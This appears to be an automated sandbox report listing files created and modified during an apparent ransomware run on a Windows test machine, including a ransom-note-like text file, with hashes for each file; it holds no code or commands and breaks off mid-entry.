SHA256: 6ea495c19b1bb882dac1c89e10e67ace231f990251a7b4918006190120e0edb3
SSDeep: 3072:i/KZvSTc+q1b9jwdfK+G4F1JS+R4civTV:iiUc+q19jwdO4pirV
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\5pycqsYyh9jtXU4a.mp3 28.72 KB MD5: 4808a5f80066f06cdf8d9f222f2cc1ac
SHA1: 18996733f9c5c63c9806a6a72eb8b6a03c417bf1
SHA256: 31b4d06a1cdb05264c7301f78ecba6b5c9b200146e86c91b73bab2e35d262164
SSDeep: 768:il9TrQcARTEh5udJqSvo/pqF/do/w79SQCkslXpp:il9w7Q8/nWE1dz79SQCBlL
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\926rqjMJjcledBP-.m4a 75.09 KB MD5: f7a2b19b2a8734e915035e129c5220bc
SHA1: a6279a6b38a14c1ee7f034c790536226132c912b
SHA256: a997b30f741a9822f49aad05bc3d9071f10fb68036956ecf4b2117a24bafcf0b
SSDeep: 1536:golhNrsiim+2/MV0hr31CNwFTKu7Yk+YbZ579/peqoC38:gofN1656JCNsTNYk+YtZ9/pePQ8
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\H9vaiExm-o.mp3 85.92 KB MD5: 6546453c6245892413a338079f1e0a2f
SHA1: e6dbfb5729e858cac328fbef8d99817eabafee43
SHA256: 045cefdfdf5ed42cb8a8a609a76bfef16191b6bbf48f25d21e64471a3f4d7273
SSDeep: 1536:0+WvI9+TDzOy8vNyqaLoEV7d2Q4D7dVbenIUFALPDXRwGpo8w2YUkrQ7q:RuI9gDzOy8j0oG7d2QC7elQ7BThwfue
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\OUfb1R.wav 52.53 KB MD5: 7f0e450f7cd4b071c5270feffc857f8e
SHA1: 77ccf5cca01b162add93ac86be9d4a3c810242da
SHA256: f37b9ce87e23e755d8b5b27611a8678b04a2d8164ddc9fb432e4c243e9434f63
SSDeep: 1536:uwAZHKRQZaok74QQ+5CorAhFUE4Ic1iqMsJ6X3yHn:4Fk174QjtOc1bMs8X3u
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\u3Lej26cURF7pFaUavmI.wav 78.00 KB MD5: 492f511bca4ec5d21a65f0f0d0daf893
SHA1: cf55013ad40925713d79d085f14d0cafaea5f9b3
SHA256: 3aff39a431338ea733e7e9abc765d02c059fd7b4b8da7ad2659705a0358cdeaa
SSDeep: 1536:5WtQcAeEalrTMTtsPCXTJ3azHKnoZu6ZPTkEUrSl1Us7I+6PQ68veY:0QcnfmwAajzZu6RGwL7t6P5BY
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\X9wKF.m4a 30.41 KB MD5: f3a14833b56d7e8eb241f055ba5dccbc
SHA1: db74ad3ac8522169fa3a0cc5161204f5172b7da8
SHA256: 1e381f4e2046bf59fb1ae257c43aec09630e12fa07e2a012c2198a4e292640f7
SSDeep: 768:JR+hsz7cbVmlV27pzDrIWGNEEOdSWtT2Kyja87OYfjMf9IAOTKBjfe:Qxmgpz/IP6lNea872IAOd
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Ylq3.m4a 57.16 KB MD5: 438d0f328e62e79a58de14ba3c0beb4f
SHA1: 66eeee65e54b3ff2db59e03de4e663ff7a8c47c3
SHA256: dc2ba5e94434ca3969e6095dab3542addf4d48c6a7ac391b5cfe6b76b6bfe563
SSDeep: 1536:hdwtaFG0AuBgz9loEAmHvVGD3PbYS1OqzLet:hdLFAh9GzmP4f4qW
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\cJ70uWo2V.m4a 51.03 KB MD5: 8e249ed0cd8f6efed56d63f3aafd5242
SHA1: 61a2e45d0a1c53c7f10f026975d6184493bcada7
SHA256: 0ec339411e1aa3e5e907289507ff2c956ae6a34d8206be1e49cb26b1fa8040c4
SSDeep: 1536:rRYQyTQcwRxjW9Lt0jn+on9JIZbIx2lufY/:rKQnzxjctPuJIxIkofY/
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\gNF41DnE96kMsiC.mp3 16.94 KB MD5: c31286358cf0c09b1ec97514364fb932
SHA1: 63de974454e1e14c62518e3162245297fdf69eb3
SHA256: 0fd0fe2c28f70b184afd5c1428c8f6ce9a7e21e1f9662ec9a24b929053702405
SSDeep: 384:GkavWQ/Siau4UNXA0GaJ5i0/cR/p3/iWmVihd6Im52Hd56:IWWRV7i0UR/p3/iWpwl52956
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\Z2GhDV1FaIXkNy.m4a 37.78 KB MD5: 4a8758ca3c23d7b028601bf9e656d503
SHA1: ed30bf63ccc39363cc8f839134fe4daa9caa3683
SHA256: fda6616b4f7476a1e7ba2b38e440a8a072a2b3eca8f408c932634b20fdf92d4f
SSDeep: 768:CsbkrwFgbqS6nQlyNXx/sjtK46NkvRWmWCB1duOAYlKdX/4AWd6P6mOhlGAIRy:CDr0S6Qux/hpWbDDVlKdX90vmOhQA7
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\9oZvTZiqj1T2ND.wav 56.14 KB MD5: 31f8719f39172bdb6b70f731c171f1ff
SHA1: 828358bca3b7c9600a1a901032717964df2dfde6
SHA256: ddbe89bfeeee499be6db7008ba468b00b54a9ce674f84c999da2a5680aa893f5
SSDeep: 768:t/TzQwpZSbpkdg2t1iURZW7L2Q19U2JBMQqd5Wb3nA3JmPQNa0Et3czUJUm0A4j2:dSt/SU+ZW7DbpwcnA5mPWzUmD+YZ2ND
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\osWp2.mp3 83.12 KB MD5: dfaf00ec54f625fac97fd8b91edf2df8
SHA1: 8704506c952b73dad80634174c7adcb0a9c56a8f
SHA256: d1bdc82e8e463b270fbb57f3e75c8f1ea311ceca57716311d1dd5ffb3f69dcaa
SSDeep: 1536:WqWrsVa7oNuZ8II8MMbO3fE8QbaJoL5UjMFJa5gebKCtugwz9UB5:ZRa0NuVSLwLeQq5HbK9gE9UD
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\U_ga_WJrGJ-jDmjIG.wav 98.00 KB MD5: 4199fd9e25f3e984fdc1cc6cbc82bb8d
SHA1: 6578948c1406b23fb8e33088a60e778f5b7fe23e
SHA256: 497c895cb260cd688736fcdfa6e784e23f589861f5cae0eda8c525d3724b840a
SSDeep: 1536:SyTgZ69y2h7DbHv3c5ikwgLDnp0Zy9FR2eqQW/jf4mCgQu0Yu6Ho0Pi/xtFzvNT0:vy6Pv4GgLDp0g9Cv/jg3X6UFrLjFv1iJ
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\fRm4zP.wav 59.25 KB MD5: 2334440916611a96179d4bbcb6abf51e
SHA1: 6dbb6f65384d27136ed749c2cd6560c7d80fd5ee
SHA256: 812b6e90682fa0c21dd79c843906085d38d42dc9c642422c4dcc09ae52a5ed81
SSDeep: 1536:1WuV7ad8ub+RGjQ3YC/gigrY21GpiDOuEe8eCqfO:4qGyW+oc3YXYZcfO
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\FSplmPyv3.m4a 99.17 KB MD5: e9c384a094a6b13c2e89d1f0d2ba7cb9
SHA1: 4eda15f487b2e7d7eaa0ea97a963de057a6e9f27
SHA256: ba034477ba1ffdb838ed7a4825f2670c6b831e3a348410837884a80c0228aa35
SSDeep: 1536:S6h1PEXilkcZvDyPkTyfJCKJRaG3a93K+O2ulxTfnnIA+EmYkbR1I8TJ:S6gilbDyscFj3uaDfnIA+DrF1tN
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\YWaVCyXnxBoBbdx.m4a 81.47 KB MD5: 6ef96e0e8891dee26325cb984c4011fb
SHA1: f36fa9e34dbbdc9d47fa7c8a5e2346433f8b8a58
SHA256: ed209675e86b10c0d1d898e7d460761838b2bbe19996d98556a078cb9d0adb36
SSDeep: 1536:6cHR5cPA3ROaNJ5lV4UbqEVcW9Xpg4IVKq+EVAClDy2slejjfA585nnead:6STr4UuEVcWd1wh+XClDyDcjuUnnek
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\_MbUJDIbnNB86DdwXKQn.wav 67.08 KB MD5: bafa16b8e45fb9edb5c6c28939a19305
SHA1: 3730d7044ebc0e7af2d4e97d3ca12661a37ed560
SHA256: 32c67c4869417af7aaa51dc154a373d8f51d1be7ec5f4b2ef24a5b13184bda1f
SSDeep: 1536:cE9KLL1VvBJVckXsoq4k+BeWGkdv10tr6c7WGjMd7Hugd:0LLTBJVU344WhF1c6c6GjMdBd
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\geOqCbV8uwQiJY9.mp3 19.67 KB MD5: 3e3dd5d66ec75b98c54f3d554139d7d6
SHA1: 2233fa469ae4e1077d92e8a540d365108b196996
SHA256: 143edde86cc1d836ce523b50f0b804e1c09c71ac235cc20549bd8124b8d98288
SSDeep: 384:Qbmt1YsRQDsTppDtPYHIsVO7t805m3nSY1uLdqmpPGtA:QSt1lHDFYHTO7t84IzSXeW
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\PKDoJjf.mp3 54.88 KB MD5: 9e5eaf17d02143afa3d8f50d7ca1d59f
SHA1: 585db4868a4abdbd08582886ffecb456d7252f57
SHA256: 1f769c16dbb4c733c518780996719da6aca38deebd4053cc89aac65af92661f6
SSDeep: 1536:TNB2LxSsbrAQz3lJc3+ve0wtCAeOP+hro9F7Yg:TNqxzAQzTS+MTdMroz3
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\vRwHl.m4a 38.09 KB MD5: 2873d0b44a9154a4b7b77ba9b6d72b6f
SHA1: 796df684dcc8671f182fb1c6084ebb7085438869
SHA256: fae8aeb72c29a1398fa30e81b5c318d86c95e3b11bbf74119c43ed3a35345f78
SSDeep: 768:J1hh2RAg3axb2uqjVMI3/mcUPE0scjRkoY/hRnGsqOGNjGuOPvLSo85Wj+sJt:JjhBhatjVMI3/mcUPpskWoY5RnGECGbL
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\D1biJ0M12k7D5tV.mp3 7.34 KB MD5: bedba0e8feeb22b52e19a3beea77c13b
SHA1: 7063665b64a02cb21d4e5a359d52b11c1f9eb61b
SHA256: 4f612b53cd1b42cccb7965d9d9d5e4e5884ef16b6506980d62273aa93c7c2f47
SSDeep: 192:lT9XaZpAkpZdI91rteSat0WWjX54U4uj/m5LALh8:lT9KZzvk1h4WjXqULAsq
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\FGCqab 6Q9IrvSbP.mp3 80.91 KB MD5: 1db2d2fe74e15f112e1d2b560278410a
SHA1: 9873ea8966bb68aa1ad2476f54a75c5ab26d23be
SHA256: 17332047a7bbfab591fc2c8af7463318ff0d932667317f1036913103dcd6b3a6
SSDeep: 1536:MmpKT5vpAPhFFc8X9Kz6H/rexMg7MJQFUoGeneqiO:MmyvpAbC8X9Kzhmkdqm6O
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\Oddm UVF74ixYdV9S.m4a 75.27 KB MD5: c4c2c48252e2b75283a16d51cd6acaed
SHA1: 7b75cabaaf03fb8407e3de9b9d2e2048cfd52c3f
SHA256: fc1fc1d5f7a9e529be4ca58a2522c41de025fa559d4a771663d3b941bfb0f45d
SSDeep: 1536:lHSkEmehPB4Oc+luSXNi1D+vzNDlUmV1ulOll8R8lydqpjSOuqDNxFaDZ8r:ltEvESXkwbZlUs1ulOllC8lO5OuqBx8E
False
C:\Users\FD1HVy\Favorites\Bing.url 976 bytes MD5: fd6f06b275927c9352289bce2cf59070
SHA1: a0e291f43a6891d8a080392ad233f4b8076ef9a5
SHA256: d63133369e64e23c1bdcd43818e113b82147346569e8a3dcbc75ff4c8bdcbec0
SSDeep: 24:389Tox48pCKJ1ap9CiBvN/r1+JO7ad/gv6B5z67c:s9448pnaxRr1kO+6zo
False
C:\HOW TO BACK YOUR FILES.txt 1.82 KB MD5: 0ded49f3ea59380a618a33270b1c8b25
SHA1: d308b62658b36458008c4273d4b23adcd5773174
SHA256: 1a91a8e7c2a54d20f264c32b33d613b613dadff4c665b6bfcdad8bf23b9ededd
SSDeep: 48:pnP3EiXyCKPVyAy6VWv1rQ2u5aRMtc773:pnPUieVyAZarQ35aRMtQ3
False
C:\ProgramData\local\.BFC0E91B00AE8A0620D3 980 bytes MD5: 9f49c750e4b5a429e6e656b8aab37176
SHA1: 2082013748c5f4a67f4ba88e70f58ef73c0dee1b
SHA256: 781227dffa9e5b402217994dfc2092dc2eea8d04357c63a8aab3c683579bec40
SSDeep: 24:+N/r1+JO7ad/gv6B5z673uErqjCumhfBevBF+e5m:+Rr1kO+6zTXDeLU
False
C:\Users\FD1HVy\Documents\3 jiOxfC.xlsx 36.45 KB MD5: 264a50913a98534c4a76637ddd6d834a
SHA1: 6296fb8004ada7c186b6ebd41a73a7a0f260d8e4
SHA256: 42d466b931d964c1dd950f718d6d4ac85a5fce5149329fa0e7da858f8d19b988
SSDeep: 768:1fT5eRjbEFrAcHNA7Po8RFLmEMS43OCaVFOiZOM9CHpDyijW:1b54EFrzHNA7ruj3gV8i4k
False
C:\Users\FD1HVy\Documents\cuZF8zNtkH1ph ibNaP.docx 74.75 KB MD5: 431b2ae88d66f6dd2624d86e9f0f750f
SHA1: 2c5095b86127604f4e28b8dcf8ab736c56f7a8ff
SHA256: a3a42ece8dc888c9da040e57f3ebcbce26283b7a5a011119568c720d2061d607
SSDeep: 1536:C0+UhxegvOXs0LIee2yvER1iyJRmMVP1O+dgUmpxi9eEL4gs3YVZAbC:T+UXeuOXsHELXx/ndDmpxg4gs3AZAe
False
C:\Users\FD1HVy\Documents\Database1.accdb 340.75 KB MD5: e2e8f44740910e3d456a3ee1654e9bd7
SHA1: 744cf7d28dfd8bccae0fc6025c5f11abe7a0763e
SHA256: c1a87c2092223220220a6e8131b9d6ec3d3539b686640a0e0ff0a40505594d9a
SSDeep: 6144:fQu46jAB4NB8f1E4eXg0MfSF4TnwdIAhCHhZxM+L1Pvgm7gbXXb3awii0UJlb/4Q:4unBB69Eg9SPIkCHhZuuPvgm7gzbaw3X
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js 1.22 MB MD5: 66de2827d924ba8ca45ac2be35aa5a4f
SHA1: a31f064f54a1c9c43313227735099ab850bbda10
SHA256: 1d43c2d59b9855e26ad50a0b759495bb145a4d856b7b5b460dd807f9e3fe0270
SSDeep: 24576:OujMR51cpVTCjZ64EkfdxpwLlqtZzCzw73AGwNyIPvz9pkTY:OujuSmjZmI79SyavhqTY
True
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js 2.91 MB MD5: 92afa234edb059602758143a128b4e2b
SHA1: 87353f2f4dd111da34fe179e03807a8e059851f1
SHA256: 75241056e91837218a99d6f9809cb9aaaa811cd35b762ee6db05b46612c9f23e
SSDeep: 49152:kqQIdTZBnejxMJdLLzDwu73gyEQEoXcnzrSDRMrfgti+DAbPJp5SuJJKeSKFM:LQwl0mJd/H173gyZXoSDGh+DAbj5BKeW
True
C:\Windows10Upgrade\resources\ux\default_eos.htm 55.31 KB MD5: c19c0b230ee25bd14bc735cd4b443719
SHA1: 9b1cf04edd423ad2ba8262cdbb5eba2144a1e168
SHA256: 7ed1269bcaa5f607fb774790dda788048ffce6b5b0f166b3ede76b511c5b007f
SSDeep: 768:KS4hRPIb2U5BuJtqMTaB35tXvvRNf0qD20bB8fhdfc5FRlh2sR/+gK71sjFv/yQA:wAn7DWaLtXbfDDVB972W/+gPFtta
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm 108.61 KB MD5: eb8e910731ca7ee08294534995e7db5a
SHA1: 277112c2d2c71b25e87e1bd4b4621b52b59f806e
SHA256: 6cbaff6dd265a122f8a14135982e53ea219e0c8fa8546e48b04310ad838a9272
SSDeep: 3072:I1Te/U4g8MKu4zoIujmrBiav3g6C4XOQVwebrmu7ZrBlH:I15ZVITrQw+QtbrtjlH
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm 69.56 KB MD5: ab19e29c07c4520f8cfa962aa03aae97
SHA1: 42b39ae4ca0e403ed78a83c99c00f954946aae55
SHA256: 808b31f7bf34a52687968e5b39e8fc311c4ed2fb060414445d0f9ab11e681529
SSDeep: 1536:3nVVyTZ83GXB/O8YmtWtGz1HgFuII8mJwoxKnR26:3nViwy11Ym0tFFuII8vxnR9
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm 57.94 KB MD5: fc4e53a3e33231b8a3f5edfd7732b364
SHA1: c587828a5c662b54ebb8abe4e30919871cd3677a
SHA256: 2197fe7cd040b03fa10120adfbe181961b8de3ccadc9e000e00470cc26d50a1e
SSDeep: 1536:AOZ0zuogonKAadgVploZwQK4bX1o5Zs7mVKz43:AOZCuoguKAadgVploZwRcyrEI
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm 68.94 KB MD5: b42e137935f05f36db65efe7a1dd37ef
SHA1: 76753d94299396525a6354735be896101265f27a
SHA256: 81044681e046f07f0361663b417b825d7ab9ccfe9cd9311d3c91247e76337b77
SSDeep: 1536:fO95Cvv4+tXKSwT5RG1pDdidjZetijHXIY4NaobxuZbUz4Pe:Pv4+xKB9RGHsdjZPHYpAoEUz4Pe
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm 62.38 KB MD5: 1c311eed40018b734d875dc020f48cc8
SHA1: b975f5efdf7587f5b12b4450965022f38b8e3e1c
SHA256: 7323dff38177d55857bd55a3dbdc20901f4a092d56f5233ec7000fc69be7ee00
SSDeep: 1536:/DSEqIdpdCqNXngJYIbuuTvoGIOyFFcuf2Mzj0Ecr1:/D3pdEaI6abUyFMMN
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm 69.84 KB MD5: 581c81e3f55f7918355a085e5388506e
SHA1: b32b0c78ba31e994d4ef868996c82e611d9d52be
SHA256: 7f7ca9a0134d485ff4b42fb5e46f195819a7569cd4ce86c0ad73032ab53eb4d9
SSDeep: 1536:T/ctOoZQXrmnleeuYCZIroWfXVfDlHYqW+e6KfMsRWM:T/51bmnlevY2DqVfx4qW16K0sRN
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm 68.52 KB MD5: b8989db8d65e7f48b7fc6df8e0648c1c
SHA1: 610f2f84f27f753ad8f34b56668163ba87c0d6c6
SHA256: d2c08f65766b5457a236a9d0a116f813538d6c16f3ff762807ca43c08593aa3c
SSDeep: 1536:SvK/7cxPCS03Z03LBOj8wW3h6cIyH9iAjdq9nhtBAB2RrIub:SvTxy3Z4h9H5dWco84
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm 68.52 KB MD5: a204392c00cf95d91160865ea0c3db91
SHA1: fb16b9c86b0209e2387c97c701dad9508524a909
SHA256: 676d9b6629b1cf4eeea00def9a8ec15a358840800bd69c2e83f150aaaa97e669
SSDeep: 1536:0FSBYZprRLo/Jm7iOO1et+ofRqNiPHaTRQFQPjcOi9lSGi:NBQHriOO1DofnyJPjcOSSX
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm 845.14 KB MD5: df4313d931a8b6ca0661efe542f17635
SHA1: 79b43c7c3b390de435cef7a18fd2cb45f2bfbfdf
SHA256: 8fce226fef5a365b36d38cd26618e425dfc8a2503316d8c59bfc3cdc7cd28e00
SSDeep: 24576:XHMhtz2/3YgznbGsTqqWrA0+MrG4y5JCpFJh:crzeyCqaL4OU5
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm 83.34 KB MD5: e3657a30677ff8a172b26b09c98fe095
SHA1: fde142087f0ad676ca1d4fe6365c79ae0b1b3706
SHA256: 9b7e8a8e79e1f34278c0bf0dd139cd06a6b43e930c02ad38b68ae3033a970b22
SSDeep: 1536:P9Aj+QzR6TTMwTk7gVtAcARXVD1EbP+/SqRVEx9OWc9hQuWZHSBeDh09xcNWCVwG:GzOfk7gVtXuVD1EgSqRuLc9sZHvF03jG
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm 68.61 KB MD5: c800df2324717f33c95b9ce041930cd6
SHA1: 10b13e886ff09b0fb67c577a3d8812486089bba3
SHA256: 1a5ae0cdaf02ac5864472b26dc0d4e0d58ac9125f75f4420660fc5a72525618c
SSDeep: 1536:vDahRuNFMandmB7hvx3h0GX/oA/EwcpH4gDUf3W7aDMsVi1cF/PVrs:vDahRQndU7hvx3h0GQ7jpH4gDktM6i1R
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm 206.08 KB MD5: 548ceb01932796294656243c44a27adf
SHA1: 406ebeb66752aa063a240827dc15892a78226a0d
SHA256: bba5cbdb2fc913bf0de46f0a67c0136138302578c13703520c4ce9289872ff60
SSDeep: 6144:zQZuA6PlrzwnGtvfAinC41oOpcHGOdaImHO8xL:zsuAhG9AMh1nSvsImHfxL
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm 82.70 KB MD5: f0b5bea6bd35a8a9fa354fe81f215988
SHA1: 41a3c8391519a1c45063d440e6e0313c29231e17
SHA256: 89ade2456b19321f667b0db94e8b4f06ec501479f37c1fffafd9b578d4750a95
SSDeep: 1536:OkA1icLnkglVxiyxw1f9/n4X7UvCIekojou8AI/B1SCcAA9azB4RkLglXZ:OrwGinflp6BjzmkCcAA9azB4RSg3
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm 66.38 KB MD5: 547ca47c3424790a6b230cb60849c0a7
SHA1: bee738f54c45d251d276840463d6e29c4359d6bc
SHA256: f978acceb0e1dc40fa54969814b7bd0d839da03770d17d8b977ab78719aabbf8
SSDeep: 1536:XvjVqESX238GpbdM5LNm+q+jVJVtHM4YuE8dSB/wmK/jOcrirkk5q2lwK:/YI38W+1tHBEomOjOcriV55
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm 80.66 KB MD5: 83ea0f2c277e115235e34520ad446bec
SHA1: d74f8a2c9e13cc6bbc123970dcbd0b499660f360
SHA256: b3f795076851c03b7387af405d6f1a9767b8bbaf438d1ed0ebad8629d7ecebbb
SSDeep: 1536:5/2H9q2zyz1NY5GgaFUIJHmA8Lmg9I4pEC+bS9kpJH:5s9vQNfUIn6meI4pEPsYH
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm 70.14 KB MD5: c606ad05e49bf6104555bbdd14970ac6
SHA1: 20f81e6ae5c40470ea8abff1650d35ce4fc65905
SHA256: 81a6c1fee296c5fe97f72239d43c176736bad9b084588e1794a3a1f79b0029ea
SSDeep: 1536:igdTQ5K/1qQWz/KmSmsHBRpaFVUgKRvcGj3LmpLV67K:im51qt/I9Rp4SD/j3LCV67K
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm 248.95 KB MD5: 8aa1730f881eaa19f7104165f5a2be79
SHA1: 58d7161e5fd5171be6959ede0660c2929cc7aac0
SHA256: 842cc8fda7e5dcb1c09ef696d6805885adc37b828a52b82752ebfec057e8dce5
SSDeep: 6144:fyTDsqeeA4MDduIuZhrgwM/SAIRXtdeGtN5wgRUXLRiO:KPGuIFwMKAk9wGt3wXb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm 144.45 KB MD5: 2be22e56d2ce1e8683d9ff1ffc80b343
SHA1: ff8fafae1bca7e016224106d00d264587201baa5
SHA256: cf06d014fdaf9c4a9b61b30b2d73c5d55efbfff107909a991c82391f72e562ed
SSDeep: 3072:7rI3Zg8Sm+gA56LIsTgb/wsoK9JHlcYD/EUn2ILqG5n+gtdhEbDJK:7E3Zr+VwIs8b/wsDlqYD/KIq2nDEDJK
False
C:\BOOTNXT 784 bytes MD5: a2c7b20c507181ee6d2a655f966596f7
SHA1: d69b38dfdd5076d54db6ad89da11a35c3992c429
SHA256: 5d0dba91b1b55be77141342246f7c439c51affe6dd73c2ca68b12517405851c0
SSDeep: 24:bWvb4tsquFix6VN/r1+JO7ad/gv6B5z67c:bA9quY6Rr1kO+6zo
False
C:\Windows10Upgrade\bootsect.exe 116.45 KB MD5: 6e53fc6aab240b1f6d27965d2de44595
SHA1: 42046ed252ff485be9aff59897d756b1a00250be
SHA256: 09ffe2bd203b4f40726a03c9461746bb1535d58b097c88aefcabc9ca6622020e
SSDeep: 3072:x/Sktl0QkB3bmvwOejXGijvSaDkjjCL7R1nyvTS20:YKkB3bmYfdkjCPAx0
False
C:\Windows10Upgrade\DW20.EXE 629.45 KB MD5: 5816183311305833f451c70355fe0212
SHA1: 05815d14449a2ad94156e30e2b7e602eef283658
SHA256: 8bf05a1ffa0f1e18db6ab03652a35b99802a5f98700f1c4532fdcfb9cb896306
SSDeep: 12288:CaJCSfFOszoD1E/Kw4nZzOPfgXfjL+u11rAPxk29:LFOszY1Zw4Z6PfOfv+u/EZk29
False
C:\Windows10Upgrade\DWTRIG20.EXE 45.45 KB MD5: fb6bb3dbd49d3f65cfe0493e094c8b35
SHA1: a4d0b0c57b78e226ddf5b0d454bfc31622af53dd
SHA256: c7c6a24aa22cc77a41b78844b5ebbcb9a1d4afc133e2b641a68232e7cdf37fdd
SSDeep: 768:LArv+d5tcsqPm9p/qr3o00yBTDT12nWOSFWwsHzp6akqC5ktkGHw3GgS:8GGW9p/kz06TDsnWlF/2tPLMktLw3+
False
C:\Windows10Upgrade\EnableWiFiTracing.cmd 10.34 KB MD5: 5ae06c6c724054d8b1fdc633460c4b4d
SHA1: e318c3b7d11703ec7cf6a26ae5e3ffb7d1e9e477
SHA256: ca42fc57a8df6f2cae7c94e4b5cc43e94e4dfebc6ae152ace38de5409aab1343
SSDeep: 192:axZ/m7NHTvIDMZjcUloNly455gWd8JLaWaQ5eDkEyl03QnlLhqZle7O0N6WYrh8:xNHTv/tO0y8oX+eSMQldqZMOPK
False
C:\Windows10Upgrade\GatherOSState.EXE 552.45 KB MD5: 329963cb509d27d024fac3cf2aa9e13c
SHA1: 326b405ab3335397cf08429d766ce029de22207b
SHA256: 30c0a49231ef4f86221fa7b1b89bc94e389a9949692db99522b43540b01a16c0
SSDeep: 12288:iMqr/7nMawEiD1QIwZCLUUC4Pg1aWogiZ7OslwL9eF1pIYYNBmD:iMsMnD1L6CgsWo3hwL9E2YZD
False
C:\Windows10Upgrade\GetCurrentRollback.EXE 72.45 KB MD5: 17768f1c2689219485917f57da793fbb
SHA1: 81a6b55b284d9de615c02f913c05ebe6ecada4fe
SHA256: a0fab7f9125cccc53a649b0b5e0cd49a92567e6e7726ed88bca7efdc088eaf46
SSDeep: 1536:apFqln/4ovlTbMSypKiv8YxMGBs1AqNuHrX6o2dTyiFnPXwXVoyQ:SFqJ79Fiv8Ca1hUWo2dyiFn//yQ
False
C:\Windows10Upgrade\HttpHelper.exe 27.95 KB MD5: 5440993116095dd551b35947ac225390
SHA1: dd2818baa32cd6a541f1618754c2e0acc074d28a
SHA256: 90e38cf8253a17ae0dbdd4ed1189e3c00bc3a8ede4250b0d7ef9f69017857448
SSDeep: 768:/TUKLlMEwOropnjpWn1IE8AvIkP62tbCHWnE2Ov:/Tpp/3+SKAAq64ySUv
False
C:\Windows10Upgrade\PostOOBEScript.cmd 1.33 KB MD5: 9131992f277c3e4ed1f65757eb7f82ea
SHA1: efe92e1c0c44b57bdd99643e568c5b7e367c1262
SHA256: 9688ac302a9b89ec91eb8118575749b0f031d1cc3e2371c2cae0d72123f07b2b
SSDeep: 24:BjiWhQlkeakAljF2ZPlcRTRZ2O+W7rkYoj/2fN/r1+JO7ad/gv6B5z67c:xulOD+yTThBr0yfRr1kO+6zo
False
C:\Windows10Upgrade\upgrader_default.log 245.08 KB MD5: 5744eb1a02ce1b0695c012eda605cdf8
SHA1: e3db8bb3ccfb6c789b7c206a6c0d42582d4de489
SHA256: fdad21292de16611ad114257f10fb787732b4f8edcb53080e430215f334b3f60
SSDeep: 6144:CtXnopZqeutTFz0VxdOHAQG4qfDAJXqlxWbyr:copZBuzAdOgQiGk
False
C:\Windows10Upgrade\upgrader_win10.log 20.83 KB MD5: d63b749aeb8d0605e07da2df282bfdcc
SHA1: c73249b866fdc47e32a6adc4e85de33f6134ea66
SHA256: 343f2c99f4d3b152c5eceda1002899c9e0118e8218e53bfc2d9506151e76cd18
SSDeep: 384:9EzveIHc6J3s0BfYRwe0gInujPvoAMNkRX/mz7xNpARg3FgE/7evZ0iGbD:9cjJJ3vOwe0gIatMNYuz7xERg3RzeCiC
False
C:\Windows10Upgrade\Windows10UpgraderApp.exe 1.35 MB MD5: 4f9085c6d66649acdf5e6c08d60e3414
SHA1: 01c25e3f9eaf123a6d150f8e6ffdafc5153a8174
SHA256: 60e18d4e558347ffec4b9660c2d740d277376ed4ef5467853ca629430b5f0b0e
SSDeep: 24576:Axd2lNtZ0RR/iNXE8YA0nidQgiWKYcCB3rrKB+eAc5OtHSYSZOci7ZgU77jzz+:AxYBZkR/DZid/tKY9N3iAc5sSYSZHi7O
False
C:\Windows10Upgrade\WinREBootApp32.exe 25.45 KB MD5: e8f17728458dafda5da90494993f1fbe
